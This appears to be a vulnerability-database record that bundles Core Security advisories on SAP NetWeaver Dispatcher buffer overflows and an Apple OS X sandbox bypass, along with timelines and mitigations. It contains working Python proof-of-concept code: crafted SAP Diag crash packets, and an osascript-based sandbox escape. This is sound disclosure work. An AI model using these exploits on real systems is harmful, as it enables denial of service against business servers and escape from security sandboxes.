\"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash \nsend_message(connection, crash) \n-----/ \n \n \n \n8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability* \n \n[CVE-2011-1517] The vulnerability can be triggered by sending a \nspecially crafted network packet to the vulnerable function \n'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a \nremote unauthenticated attacker to conduct a denial of service attack \nagainst the vulnerable systems. The following python code can be used to \ntrigger the vulnerability: \n \n/----- \ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\" \nsend_message(connection, crash) \n-----/ \n \n \n \n8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability* \n \n[CVE-2012-2511] The vulnerability can be triggered by sending a \nspecially crafted network packet to the vulnerable function \n'DiagTraceAtoms'. This vulnerability could allow a remote \nunauthenticated attacker to conduct a denial of service attack. The \nfollowing python code can be used to trigger the vulnerability: \n \n/----- \ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8 \nsend_message(connection, crash) \n-----/ \n \n \n \n8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability* \n \n[CVE-2012-2512] The vulnerability can be triggered by sending a \nspecially crafted network packet to the vulnerable function \n'DiagTraceStreamI' and could allow a remote unauthenticated attacker to \nconduct a denial of service attack. \n \n/----- \ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\" \nsend_message(connection, crash) \n-----/ \n \n \n \n8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability* \n \n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable \nfunction 'Diaginput', allowing a denial of service attack against the \nvulnerable systems. \n \n/----- \ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10 \nsend_message(connection, crash) \n-----/ \n \n \n \n8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability* \n \n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable \nfunction 'DiagiEventSource' in the 'disp+work.exe' module. This \nvulnerability could allow a remote unauthenticated attacker to conduct a \ndenial of service attack. \n \n/----- \ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17 \nsend_message(connection, crash) \n-----/ \n \n \n \n9. *Report Timeline* \n \n. 2012-01-24: \nCore Security Technologies notifies the SAP team of the vulnerability, \nsetting the estimated publication date of the advisory for February \n21st, 2012. \n \n. 2012-01-24: \nCore sends an advisory draft with technical details. \n \n. 2012-01-24: \nThe SAP team confirms the reception of the issue and asks to use the \nsecurity ID 582820-2012 for further communication. SAP also notifies its \nterms and conditions [3], and asks for Core to commit to that guideline. \n \n. 2012-02-01: \nThe Core Advisories Team communicates that it has its own guidelines for \nthe advisories publication process, which may conflict with SAP's \nguidelines. In particular, Core does not guarantee that the publication \nof the advisory will be postponed until a fix or patch is made available \nby SAP. If information about this vulnerability is partially or \ncompletely leaked by a third party, the advisory would be released \nimmediately as forced release. Despite this, the Core team commits to \ncomply with SAP's guidelines as much as possible. \n \n. 2012-02-21: \nFirst release date missed. \n \n. 2012-02-22: \nCore asks for the status of the fix and notifies that the release date \nwas missed. \n \n. 2012-02-23: \nSAP notifies that, because the development team has to downport the \nsolutions for a huge bunch of software releases, the earliest release \ndate for the patches would be May 8th 2012. \n \n. 2012-02-23: \nCore re-schedules the advisory publication to May 8th. \n \n. 2012-04-16: \nCore asks if the patching process is still on track to release patches \non May 8th and requests a status of the fix. \n \n. 2012-04-16: \nVendor notifies that the release date is still planned for May 8th, but \ndue to quality control processes this date cannot be guaranteed. \n \n. 2012-05-04: \nCore notifies that everything is ready for publication and requests the \nvendor to confirm the release date and the list of affected platforms \n(no reply received). \n \n. 2012-05-07: \nCore asks again for the status of the fix. \n \n. 2012-05-08: \nSAP notifies that they have released the security note 1687910 [4] on \nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP \nalso requests Core to remove all the technical information researched by \nMartin Gallo in [Sec. 8]. \n \n. 2012-05-08: \nCore replies that the reporting of vulnerabilities is aimed at helping \nvulnerable users to understand and address the issues; the advisory will \nthus be released with the technical information. \n \n. 2012-05-08: \nAdvisory CORE-2012-0123 published. \n \n \n \n10. *References* \n \n[1] http://www.sap.com/platform/netweaver/index.epx \n[2] \nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm \n[3] SAP's legal information, terms and conditions \nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \n \n[4] SAP security note 1687910 \nhttps://service.sap.com/sap/support/notes/1687910. \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2012 Core Security \nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n \n \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112538/CORE-2012-0123.txt"}, {"lastseen": "2016-12-05T22:20:41", "description": "", "published": "2011-11-11T00:00:00", "type": "packetstorm", "title": "Apple OS X Sandbox Predefined Profiles Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516"], "modified": "2011-11-11T00:00:00", "id": "PACKETSTORM:106850", "href": "https://packetstormsecurity.com/files/106850/Apple-OS-X-Sandbox-Predefined-Profiles-Bypass.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n \nCore Security - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nApple OS X Sandbox Predefined Profiles Bypass \n \n \n1. *Advisory Information* \n \nTitle: Apple OS X Sandbox Predefined Profiles Bypass \nAdvisory ID: CORE-2011-0919 \nAdvisory URL: http://www.coresecurity.com/content/apple-osx-sandbox-bypass \nDate published: 2011-11-10 \nDate of last update: 2011-11-10 \nVendors contacted: Apple \nRelease mode: User release \n \n \n2. *Vulnerability Information* \n \nClass: Access control failure [CWE-264] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2011-1516 \n \n \n3. *Vulnerability Description* \n \nSeveral of the default pre-defined sandbox profiles don't properly \nlimit all the available mechanisms and therefore allow exercising part \nof the restricted functionality. Namely, sending Apple events is \npossible within the no-network sandbox (kSBXProfileNoNetwork). A \ncompromised application hypothetically restricted by the use of the \nno-network profile may have access to network resources through the \nuse of Apple events to invoke the execution of other applications not \ndirectly restricted by the sandbox. \n \nIt is worth mentioning that a similar issue was reported by Charlie \nMiller in his talk at Black Hat Japan 2008 [2]. He mentioned a few \nprocesses sandboxed by default as well as a method to circumvent the \nprotection. Sometime after the talk, Apple modified the mentioned \nprofiles by restricting the use of Apple events but did not modify the \ngeneric profiles. \n \n \n4. *Vulnerable packages* \n \n. Apple Mac OS X 10.7.x \n. Apple Mac OS X 10.6.x \n. Apple Mac OS X 10.5.x \n \n \n5. *Non-vulnerable packages* \n \n. Apple Mac OS X 10.4 \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nContact the vendor for more information. \n \n \n7. *Credits* \n \nThis vulnerability was discovered and researched by Anibal Sacco and \nMatias Eissler from Core Security Technologies. The publication of \nthis advisory was coordinated by Carlos Sarraute. \n \n \n8. *Technical Description / Proof of Concept Code* \n \nThe use of Apple events is possible within the several default \nprofiles as no-network, no-internet (kSBXProfileNoNetwork, \nkSBXProfileNoInternet) and others. A compromised application \nhypothetically restricted by the use of the no-network profile may \nhave access to network resources through the use of Apple events to \ninvoke the execution of other applications not directly restricted by \nthe sandbox. \n \nAs Apple's \"App Sandbox Design Guide\" document points out, \napplications that require sending Apple events to other arbitrary \napplications are not suitable for sandboxing, because some developer \ntools restrict Apple events by default while defining the sandbox. The \nreason for this is that, as we show here, by dispatching Apple events \na process can escape the sandbox [1]. \n \nThe method used by Charlie Miller involves dropping a script to the \ndisk and getting it executed by launchd via launchctl. Our approach is \ntechnically the same without the need to drop a file. In our PoC we \nused \"osascript\" to send the required Apple events to launchd in order \nto execute the new process. As the new process is not a 'child' of the \nsandboxed process, it is created without the sandbox restrictions. \n \nAn additional risk with these profiles is that they are supposed to \nprovide an example of how a process should be restricted in different \nscenarios. If the no-network profile allows Apple-script events, this \nmay result in new applications using the same restriction rules, \ntherefore offering a false sense of security. \n \nThe following PoC illustrates this vulnerability: \n \n/----- \nimport os \nimport sys \nimport socket \n \nif len(sys.argv) != 2: \nprint \"[-] Usage: sandbox-exec -n no-network python %s hostname\" % \nsys.argv[0] \n \ntry: \ntargetIP = sys.argv[1] \ns = socket.socket() \ns.connect((targetIP, 80)) \ns.send('GET /\\r\\n\\r\\n') \nprint(s.recv(1024)) \nprint \"\\n\\n\\n[+] Sandbox escaped\" \n \nexcept Exception, e: \nif \"Operation not permitted\" in str(e): #print repr(e) \nprint \"[-] Blocked by seatbelt\" \nprint \"[ ] Escaping...\" \nos.system(\"\"\"/usr/bin/osascript -e 'tell application \n\"Terminal\" to do script \"python %s %s\"'\"\"\" % (sys.argv[0], targetIP)) \n \n- -----/ \n \n \n9. *Report Timeline* \n \n. 2011-09-20: \nCore Security Technologies notifies Apple Product Security of the \nvulnerability, including technical details. Preliminary publication \ndate is set to November 7, 2011. \n \n. 2010-09-20: \nVendor acknowledges the receipt of the information. \n \n. 2010-10-05: \nVendor informs that it does not see any actual security implications. \nThe kSBXProfileNoNetwork sandbox profile does not promise that Apple \nEvents will be blocked in the documentation. (Specifically, all it \nguarantees is \"all sockets-based networking is prohibited\".) \n \n. 2011-10-13: \nCore responds that the kSBXProfileNoNetwork sandbox profile should \nguarantee that \"all sockets-based networking is prohibited\". The PoC \nsent to Apple shows that through the use of Apple events (osascript is \nused in the PoC just to keep it simple) an attacker could circumvent \nthe restriction. So, at the end, sockets-based networking is used. \n \n. 2010-10-18: \nVendor responds that it is currently considering modifying its \ndocumentation to explicitly point out what Core described; namely, \nthat the restrictions that these particular sandbox profiles provide \nare limited to the process in which the sandbox is applied. \n \n. 2011-11-10: \nThe advisory CORE-2011-0919 is published as user release. \n \n \n10. *References* \n \n[1] App Sandbox Design Guide -- Designing for App Sandbox \nhttp://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/DesigningYourSandbox/DesigningYourSandbox.html \n \n[2] Charlie Miller, \"Hacking OS X\", Black Hat Japan 2008 \nhttps://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is \ncharged with anticipating the future needs and requirements for \ninformation security technologies. We conduct our research in several \nimportant areas of computer security including system vulnerabilities, \ncyber attack planning and simulation, source code auditing, and \ncryptography. Our results include problem formalization, \nidentification of vulnerabilities, novel solutions and prototypes for \nnew technologies. CoreLabs regularly publishes security advisories, \ntechnical papers, project information and shared software tools for \npublic use at: http://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of \nthreats with security test and measurement solutions that continuously \nidentify and demonstrate real-world exposures to their most critical \nassets. Our customers can gain real visibility into their security \nstanding, real validation of their security controls, and real metrics \nto more effectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2011 Core Security \nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v2.0.17 (MingW32) \n \niEYEARECAAYFAk68OxMACgkQyNibggitWa0YWgCfYbGm9R0+YJw6CxP6TNwdhEWr \n9ZMAn16nqBqNbO582D5QpejeuTEV5RAj \n=HruN \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/106850/CORE-2011-0919.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2011-1516", "CVE-2011-1517", "CVE-2012-2514", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2511"], "description": "Multiple vulnerabilities in Dispatcher service.", "edition": 1, "modified": "2012-05-14T00:00:00", "published": "2012-05-14T00:00:00", "id": "SECURITYVULNS:VULN:12379", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12379", "title": "SAP NetWeaver multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-1516"], "description": "It's possible to bypass sandbox restriction by controlling different applications.", "edition": 1, "modified": "2011-11-16T00:00:00", "published": "2011-11-16T00:00:00", "id": "SECURITYVULNS:VULN:12038", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12038", "title": "Apple Mac Os X sandbox protection bypass", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-1516"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n Core Security - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Apple OS X Sandbox Predefined Profiles Bypass\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Apple OS X Sandbox Predefined Profiles Bypass\r\nAdvisory ID: CORE-2011-0919\r\nAdvisory URL: http://www.coresecurity.com/content/apple-osx-sandbox-bypass\r\nDate published: 2011-11-10\r\nDate of last update: 2011-11-10\r\nVendors contacted: Apple\r\nRelease mode: User release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Access control failure [CWE-264]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1516\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nSeveral of the default pre-defined sandbox profiles don't properly\r\nlimit all the available mechanisms and therefore allow exercising part\r\nof the restricted functionality. Namely, sending Apple events is\r\npossible within the no-network sandbox (kSBXProfileNoNetwork). A\r\ncompromised application hypothetically restricted by the use of the\r\nno-network profile may have access to network resources through the\r\nuse of Apple events to invoke the execution of other applications not\r\ndirectly restricted by the sandbox.\r\n\r\nIt is worth mentioning that a similar issue was reported by Charlie\r\nMiller in his talk at Black Hat Japan 2008 [2]. He mentioned a few\r\nprocesses sandboxed by default as well as a method to circumvent the\r\nprotection. Sometime after the talk, Apple modified the mentioned\r\nprofiles by restricting the use of Apple events but did not modify the\r\ngeneric profiles.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Apple Mac OS X 10.7.x\r\n . Apple Mac OS X 10.6.x\r\n . Apple Mac OS X 10.5.x\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Apple Mac OS X 10.4\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nContact the vendor for more information.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Anibal Sacco and\r\nMatias Eissler from Core Security Technologies. The publication of\r\nthis advisory was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe use of Apple events is possible within the several default\r\nprofiles as no-network, no-internet (kSBXProfileNoNetwork,\r\nkSBXProfileNoInternet) and others. A compromised application\r\nhypothetically restricted by the use of the no-network profile may\r\nhave access to network resources through the use of Apple events to\r\ninvoke the execution of other applications not directly restricted by\r\nthe sandbox.\r\n\r\nAs Apple's "App Sandbox Design Guide" document points out,\r\napplications that require sending Apple events to other arbitrary\r\napplications are not suitable for sandboxing, because some developer\r\ntools restrict Apple events by default while defining the sandbox. The\r\nreason for this is that, as we show here, by dispatching Apple events\r\na process can escape the sandbox [1].\r\n\r\nThe method used by Charlie Miller involves dropping a script to the\r\ndisk and getting it executed by launchd via launchctl. Our approach is\r\ntechnically the same without the need to drop a file. In our PoC we\r\nused "osascript" to send the required Apple events to launchd in order\r\nto execute the new process. As the new process is not a 'child' of the\r\nsandboxed process, it is created without the sandbox restrictions.\r\n\r\nAn additional risk with these profiles is that they are supposed to\r\nprovide an example of how a process should be restricted in different\r\nscenarios. If the no-network profile allows Apple-script events, this\r\nmay result in new applications using the same restriction rules,\r\ntherefore offering a false sense of security.\r\n\r\nThe following PoC illustrates this vulnerability:\r\n\r\n/-----\r\nimport os\r\nimport sys\r\nimport socket\r\n\r\nif len(sys.argv) != 2:\r\n print "[-] Usage: sandbox-exec -n no-network python %s hostname" %\r\nsys.argv[0]\r\n\r\ntry:\r\n targetIP = sys.argv[1]\r\n s = socket.socket()\r\n s.connect((targetIP, 80))\r\n s.send('GET /\r\n\r\n')\r\n print(s.recv(1024))\r\n print "\n\n\n[+] Sandbox escaped"\r\n\r\nexcept Exception, e:\r\n if "Operation not permitted" in str(e): #print repr(e)\r\n print "[-] Blocked by seatbelt"\r\n print "[ ] Escaping..."\r\n os.system("""/usr/bin/osascript -e 'tell application\r\n"Terminal" to do script "python %s %s"'""" % (sys.argv[0], targetIP))\r\n\r\n- -----/\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n 2011-09-20:\r\nCore Security Technologies notifies Apple Product Security of the\r\nvulnerability, including technical details. Preliminary publication\r\ndate is set to November 7, 2011.\r\n\r\n 2010-09-20:\r\nVendor acknowledges the receipt of the information.\r\n\r\n 2010-10-05:\r\nVendor informs that it does not see any actual security implications.\r\nThe kSBXProfileNoNetwork sandbox profile does not promise that Apple\r\nEvents will be blocked in the documentation. (Specifically, all it\r\nguarantees is "all sockets-based networking is prohibited".)\r\n\r\n 2011-10-13:\r\nCore responds that the kSBXProfileNoNetwork sandbox profile should\r\nguarantee that "all sockets-based networking is prohibited". The PoC\r\nsent to Apple shows that through the use of Apple events (osascript is\r\nused in the PoC just to keep it simple) an attacker could circumvent\r\nthe restriction. So, at the end, sockets-based networking is used.\r\n\r\n 2010-10-18:\r\nVendor responds that it is currently considering modifying its\r\ndocumentation to explicitly point out what Core described; namely,\r\nthat the restrictions that these particular sandbox profiles provide\r\nare limited to the process in which the sandbox is applied.\r\n\r\n 2011-11-10:\r\nThe advisory CORE-2011-0919 is published as user release.\r\n\r\n\r\n10. *References*\r\n\r\n[1] App Sandbox Design Guide -- Designing for App Sandbox\r\nhttp://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/DesigningYourSandbox/DesigningYourSandbox.html\r\n\r\n[2] Charlie Miller, "Hacking OS X", Black Hat Japan 2008\r\nhttps://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is\r\ncharged with anticipating the future needs and requirements for\r\ninformation security technologies. We conduct our research in several\r\nimportant areas of computer security including system vulnerabilities,\r\ncyber attack planning and simulation, source code auditing, and\r\ncryptography. Our results include problem formalization,\r\nidentification of vulnerabilities, novel solutions and prototypes for\r\nnew technologies. CoreLabs regularly publishes security advisories,\r\ntechnical papers, project information and shared software tools for\r\npublic use at: http://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of\r\nthreats with security test and measurement solutions that continuously\r\nidentify and demonstrate real-world exposures to their most critical\r\nassets. Our customers can gain real visibility into their security\r\nstanding, real validation of their security controls, and real metrics\r\nto more effectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.17 (MingW32)\r\n\r\niEYEARECAAYFAk68OxMACgkQyNibggitWa0YWgCfYbGm9R0+YJw6CxP6TNwdhEWr\r\n9ZMAn16nqBqNbO582D5QpejeuTEV5RAj\r\n=HruN\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-11-16T00:00:00", "published": "2011-11-16T00:00:00", "id": "SECURITYVULNS:DOC:27304", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27304", "title": "CORE-2011-0919: Apple OS X Sandbox Predefined Profiles Bypass", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:05:19", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "SAP Netweaver Dispatcher Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516", "CVE-2011-1517", "CVE-2012-2511", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2514"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72871", "id": "SSV:72871", "sourceData": "\n Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nSAP Netweaver Dispatcher Multiple Vulnerabilities\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\r\nAdvisory ID: CORE-2012-0123\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\r\nDate published: 2012-05-08\r\nDate of last update: 2012-05-08\r\nVendors contacted: SAP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Buffer overflow [CWE-119]\r\nImpact: Code execution, Denial of service\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\r\nCVE-2012-2513, CVE-2012-2514\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nSAP Netweaver [1] is a technology platform for building and integrating\r\nSAP business applications. Multiple vulnerabilities have been found in\r\nSAP Netweaver that could allow an unauthenticated, remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered sending specially crafted SAP Diag packets\r\nto remote TCP port 32NN (being NN the SAP system number) of a host\r\nrunning the "Dispatcher" service, part of SAP Netweaver Application\r\nServer ABAP. By sending different messages, the different\r\nvulnerabilities can be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).\r\n . SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).\r\n . Older versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Vendor did not provide this information.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nSAP released the security note\r\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\r\nissues. Contact SAP for further information.\r\n\r\nMartin Gallo proposed the following actions to mitigate the impact of\r\nthe vulnerabilities:\r\n\r\n 1. Disable work processes' Developer Traces for the 'Dialog\r\nProcessing' component (for the vulnerabilities [CVE-2011-1516],\r\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).\r\n 2. Restrict access to the Dispatcher service's TCP ports (3200/3299)\r\n(for all vulnerabilities).\r\n 3. Restrict access to the work process management transactions\r\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\r\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\r\n[CVE-2012-2512]).\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Martin Gallo\r\nfrom\r\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services.\r\nThe publication of this advisory was coordinated by Fernando Miranda\r\nfrom http://www.coresecurity.com/content/corelabs-advisories .\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in\r\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\r\nand [CVE-2012-2512]).\r\n\r\nThe following python script can be used to reproduce the vulnerabilities\r\ndescribed below:\r\n\r\n/-----\r\nimport socket, struct\r\nfrom optparse import OptionParser\r\n\r\n# Parse the target options\r\nparser = OptionParser()\r\nparser.add_option("-l", "--hostname", dest="hostname", help="Hostname",\r\ndefault="localhost")\r\nparser.add_option("-p", "--port", dest="port", type="int", help="Port\r\nnumber", default=3200)\r\n(options, args) = parser.parse_args()\r\n\r\ndef send_packet(sock, packet):\r\n packet = struct.pack("!I", len(packet)) + packet\r\n sock.send(packet)\r\n\r\ndef receive(sock):\r\n length = sock.recv(4)\r\n (length, ) = struct.unpack("!I", length)\r\n data = ""\r\n while len(data)<length:\r\n data+= sock.recv(length)\r\n return (length, data)\r\n\r\ndef initialize(sock):\r\n diagheader = "\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00"\r\n user_connect =\r\n"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8"\r\n support_data = "\\x10\\x04\\x0b\\x00\\x20"\r\n support_data+=\r\n"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93"\r\n support_data+=\r\n"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n dpheader =\r\n"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff"\r\n dpheader+= struct.pack("I", len(diagheader + user_connect +\r\nsupport_data))\r\n dpheader+=\r\n"\\x00\\xff\\xff\\xff\\xff\\xff\\xff "\r\n dpheader+= "terminalXXXXXXX"\r\n dpheader+=\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \r\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\r\n\r\ndef send_message(sock, message):\r\n diagheader = "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n step = "\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01"\r\n eom = "\\x0c"\r\n 